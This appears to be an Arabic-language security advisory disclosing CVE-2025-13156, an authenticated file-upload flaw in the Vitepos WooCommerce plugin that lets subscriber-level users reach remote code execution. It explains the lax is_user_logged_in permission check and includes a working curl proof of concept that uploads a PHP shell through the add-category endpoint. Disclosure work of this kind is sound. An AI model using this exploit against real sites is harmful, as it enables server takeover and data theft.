
الإفصاح عن CVE-2025-13156
إفصاح عن CVE-2025-13156
يستعرض هذا المستودع ثغرة تم اكتشافها في Vitepos – Point of Sale (POS) for WooCommerce <= 3.3.0، وهي إضافة ووردبريس مطوّرة بواسطة appsbd.
| CVE ID | النوع | المكوّن | الأثر |
|---|
| CVE-2025-13156 | رفع ملفات تعسفي مُصادق عليه (مشترك فما فوق) يؤدي إلى تنفيذ أكواد عن بُعد | modules/class-pos-settings.php api/v1/class-pos-product-api.php | رفع ملفات تعسفية على خادم الموقع المتأثر |
curl -k \
'http://localhost:8080/wp-json/vitepos/v1/product/add-category' \
-H 'Cookie: wordpress_logged_in_<your_hash>=<your_cookie>' \
-H 'X-WP-Nonce: <your_nonce>' \
-F 'category_name=evil' \
-F 'category_parent=0' \
-F 'category_description=PoC-shell' \
-F 'category_image=@./shell.php;filename="shell.php";type=application/octet-stream'
تعتمد مسارات REST الخاصة بالإضافة ضمن /wp-json/vitepos/v1/product/... على فحص صلاحيات متساهل يقبل فعليًا أي مستخدم مسجّل دخول (is_user_logged_in())، متجاهلًا ما إذا كان المتصل مستخدم POS أو يمتلك صلاحية إدارة مصطلحات المنتج. ونتيجة لذلك، يمكن للأدوار منخفضة الصلاحيات (مثل المشترك) الوصول إلى نقاط نهاية مثل add-category/update-category.
نظرًا لتعذُّر وضعه مباشرةً تحت WebRoot، فقد لا ينجح الهجوم في بعض البيئات. وبما أن تنفيذ PHP غير مسموح به أساسًا تحت Uploads، اعتقدت أنه لن يكون ممكنًا إلا في بيئة غير اعتيادية حقًا. وما إن رأيت السلسلة application/octet-stream في قائمة MIME المسموحة حتى شعرت بسوء ظن، لكن الهجوم نجح فعلًا، وكان ذلك مفاجئًا. في العادة يمنع نواة ووردبريس رفع ملفات PHP، لكن هذه الإضافة نفّذت معالجة خاصة بها، لذا أمكن إعادة إنتاج هذه الثغرة. إنها حالة نادرة جدًا.
الاسم: MooseLove
الدور: باحث أمني مستقل / صائد ثغرات
التواصل: متاح عند الطلب
يُقدَّم هذا التنبيه الأمني للتوعية الأمنية العامة. يمكن مشاركته بحرية مع ذكر المصدر.